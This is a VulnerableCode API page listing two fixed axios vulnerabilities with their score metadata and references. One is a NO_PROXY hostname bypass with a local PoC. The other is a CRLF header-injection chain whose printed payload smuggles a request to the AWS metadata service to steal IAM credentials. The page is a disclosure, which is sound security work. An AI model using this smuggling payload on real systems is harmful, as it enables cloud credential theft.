Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:npm/axios@1.15.0
Typenpm
Namespace
Nameaxios
Version1.15.0
Qualifiers
Subpath
Is_vulnerablefalse
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
Fixing_vulnerabilities
0
url VCID-axk7-6q4b-vuga
vulnerability_id VCID-axk7-6q4b-vuga
summary 
Axios has a NO_PROXY Hostname Normalization Bypass Leads to SSRF
Axios does not correctly handle hostname normalization when checking `NO_PROXY` rules.
Requests to loopback addresses like `localhost.` (with a trailing dot) or `[::1]` (IPv6 literal) skip `NO_PROXY` matching and go through the configured proxy.

This goes against what developers expect and lets attackers force requests through a proxy, even if `NO_PROXY` is set up to protect loopback or internal services.

According to [RFC 1034 §3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1) and [RFC 3986 §3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2), a hostname can have a trailing dot to show it is a fully qualified domain name (FQDN). At the DNS level, `localhost.` is the same as `localhost`. 
However, Axios does a literal string comparison instead of normalizing hostnames before checking `NO_PROXY`. This causes requests like `http://localhost.:8080/` and `http://[::1]:8080/` to be incorrectly proxied.

This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections.

---

**PoC**

```js
import http from "http";
import axios from "axios";

const proxyPort = 5300;

http.createServer((req, res) => {
  console.log("[PROXY] Got:", req.method, req.url, "Host:", req.headers.host);
  res.writeHead(200, { "Content-Type": "text/plain" });
  res.end("proxied");
}).listen(proxyPort, () => console.log("Proxy", proxyPort));

process.env.HTTP_PROXY = `http://127.0.0.1:${proxyPort}`;
process.env.NO_PROXY = "localhost,127.0.0.1,::1";

async function test(url) {
  try {
    await axios.get(url, { timeout: 2000 });
  } catch {}
}

setTimeout(async () => {
  console.log("\n[*] Testing http://localhost.:8080/");
  await test("http://localhost.:8080/"); // goes through proxy

  console.log("\n[*] Testing http://[::1]:8080/");
  await test("http://[::1]:8080/"); // goes through proxy
}, 500);
```

**Expected:** Requests bypass the proxy (direct to loopback).
**Actual:** Proxy logs requests for `localhost.` and `[::1]`.

---

**Impact**

* Applications that rely on `NO_PROXY=localhost,127.0.0.1,::1` for protecting loopback/internal access are vulnerable.
* Attackers controlling request URLs can:

  * Force Axios to send local traffic through an attacker-controlled proxy.
  * Bypass SSRF mitigations relying on NO\_PROXY rules.
  * Potentially exfiltrate sensitive responses from internal services via the proxy.
  
  
---

**Affected Versions**

* Confirmed on Axios **1.12.2** (latest at time of testing).
* affects all versions that rely on Axios’ current `NO_PROXY` evaluation.

---

**Remediation**
Axios should normalize hostnames before evaluating `NO_PROXY`, including:

* Strip trailing dots from hostnames (per RFC 3986).
* Normalize IPv6 literals by removing brackets for matching.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-62718
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03312
published_at 2026-04-12T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.0329
published_at 2026-04-13T12:55:00Z
2
value 0.00015
scoring_system epss
scoring_elements 0.0334
published_at 2026-04-11T12:55:00Z
3
value 0.00034
scoring_system epss
scoring_elements 0.09709
published_at 2026-04-16T12:55:00Z
4
value 0.00034
scoring_system epss
scoring_elements 0.09679
published_at 2026-04-18T12:55:00Z
5
value 0.00041
scoring_system epss
scoring_elements 0.12512
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-62718
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718
3
reference_url https://datatracker.ietf.org/doc/html/rfc1034#section-3.1
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://datatracker.ietf.org/doc/html/rfc1034#section-3.1
4
reference_url https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
5
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
6
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
7
reference_url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
8
reference_url https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df
9
reference_url https://github.com/axios/axios/pull/10661
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/pull/10661
10
reference_url https://github.com/axios/axios/pull/10688
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/pull/10688
11
reference_url https://github.com/axios/axios/releases/tag/v0.31.0
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/releases/tag/v0.31.0
12
reference_url https://github.com/axios/axios/releases/tag/v1.15.0
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/releases/tag/v1.15.0
13
reference_url https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
4
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
5
value CRITICAL
scoring_system generic_textual
scoring_elements
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-62718
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-62718
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2456913
reference_id 2456913
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2456913
16
reference_url https://github.com/advisories/GHSA-3p68-rc4w-qgx5
reference_id GHSA-3p68-rc4w-qgx5
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3p68-rc4w-qgx5
17
reference_url https://access.redhat.com/errata/RHSA-2026:8483
reference_id RHSA-2026:8483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8483
18
reference_url https://access.redhat.com/errata/RHSA-2026:8484
reference_id RHSA-2026:8484
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8484
19
reference_url https://access.redhat.com/errata/RHSA-2026:8490
reference_id RHSA-2026:8490
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8490
20
reference_url https://access.redhat.com/errata/RHSA-2026:8491
reference_id RHSA-2026:8491
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8491
21
reference_url https://access.redhat.com/errata/RHSA-2026:8493
reference_id RHSA-2026:8493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8493
fixed_packages
0
url pkg:npm/axios@0.31.0
purl pkg:npm/axios@0.31.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.31.0
1
url pkg:npm/axios@1.15.0
purl pkg:npm/axios@1.15.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0
aliases CVE-2025-62718, GHSA-3p68-rc4w-qgx5
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-axk7-6q4b-vuga
1
url VCID-ek49-tuj4-t3ap
vulnerability_id VCID-ek49-tuj4-t3ap
summary 
Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain
# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

## Summary
The Axios library is vulnerable to a specific "Gadget" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).

While Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.

**Severity**: Critical (CVSS 9.9)
**Affected Versions**: All versions (v0.x - v1.x)
**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)

## Usage of "Helper" Vulnerabilities
This vulnerability is unique because it requires **Zero Direct User Input**.
If an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.

Because Axios does not sanitise these merged header values for CRLF (`\r\n`) characters, the polluted property becomes a **Request Smuggling** payload.

## Proof of Concept

### 1. The Setup (Simulated Pollution)
Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:
```javascript
Object.prototype['x-amz-target'] = "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore";
```

### 2. The Gadget Trigger (Safe Code)
The application makes a completely safe, hardcoded request:
```javascript
// This looks safe to the developer
await axios.get('https://analytics.internal/pings'); 
```

### 3. The Execution
Axios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.

**Resulting HTTP traffic:**
```http
GET /pings HTTP/1.1
Host: analytics.internal
x-amz-target: dummy

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

GET /ignore HTTP/1.1
...
```

### 4. The Impact (IMDSv2 Bypass)
The "Smuggled" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).
The Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.

## Impact Analysis
-   **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).
-   **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.
-   **Cache Poisoning**: Can inject `Host` headers to poison shared caches.

## Recommended Fix
Validate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.

**Patch Suggestion:**
```javascript
// In lib/adapters/http.js
utils.forEach(requestHeaders, function setRequestHeader(val, key) {
  if (/[\r\n]/.test(val)) {
    throw new Error('Security: Header value contains invalid characters');
  }
  // ... proceed to set header
});
```

## References
-   **OWASP**: CRLF Injection (CWE-113)

This report was generated as part of a security audit of the Axios library.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.13652
published_at 2026-04-21T12:55:00Z
1
value 0.00136
scoring_system epss
scoring_elements 0.33357
published_at 2026-04-18T12:55:00Z
2
value 0.00239
scoring_system epss
scoring_elements 0.46982
published_at 2026-04-11T12:55:00Z
3
value 0.00239
scoring_system epss
scoring_elements 0.46962
published_at 2026-04-13T12:55:00Z
4
value 0.00239
scoring_system epss
scoring_elements 0.46955
published_at 2026-04-12T12:55:00Z
5
value 0.0053
scoring_system epss
scoring_elements 0.67279
published_at 2026-04-16T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
5
reference_url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
6
reference_url https://github.com/axios/axios/pull/10660
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/pull/10660
7
reference_url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
8
reference_url https://github.com/axios/axios/pull/10688
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/pull/10688
9
reference_url https://github.com/axios/axios/releases/tag/v0.31.0
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/releases/tag/v0.31.0
10
reference_url https://github.com/axios/axios/releases/tag/v1.15.0
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/releases/tag/v1.15.0
11
reference_url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
4
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
5
value CRITICAL
scoring_system generic_textual
scoring_elements
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
8
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
reference_id 2457432
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
14
reference_url https://github.com/advisories/GHSA-fvcv-3m26-pcqx
reference_id GHSA-fvcv-3m26-pcqx
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fvcv-3m26-pcqx
15
reference_url https://access.redhat.com/errata/RHSA-2026:8483
reference_id RHSA-2026:8483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8483
16
reference_url https://access.redhat.com/errata/RHSA-2026:8484
reference_id RHSA-2026:8484
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8484
17
reference_url https://access.redhat.com/errata/RHSA-2026:8490
reference_id RHSA-2026:8490
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8490
18
reference_url https://access.redhat.com/errata/RHSA-2026:8491
reference_id RHSA-2026:8491
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8491
19
reference_url https://access.redhat.com/errata/RHSA-2026:8493
reference_id RHSA-2026:8493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8493
20
reference_url https://access.redhat.com/errata/RHSA-2026:8499
reference_id RHSA-2026:8499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8499
21
reference_url https://access.redhat.com/errata/RHSA-2026:8500
reference_id RHSA-2026:8500
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8500
22
reference_url https://access.redhat.com/errata/RHSA-2026:8501
reference_id RHSA-2026:8501
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8501
fixed_packages
0
url pkg:npm/axios@0.31.0
purl pkg:npm/axios@0.31.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.31.0
1
url pkg:npm/axios@1.15.0
purl pkg:npm/axios@1.15.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0
aliases CVE-2026-40175, GHSA-fvcv-3m26-pcqx
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ek49-tuj4-t3ap
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0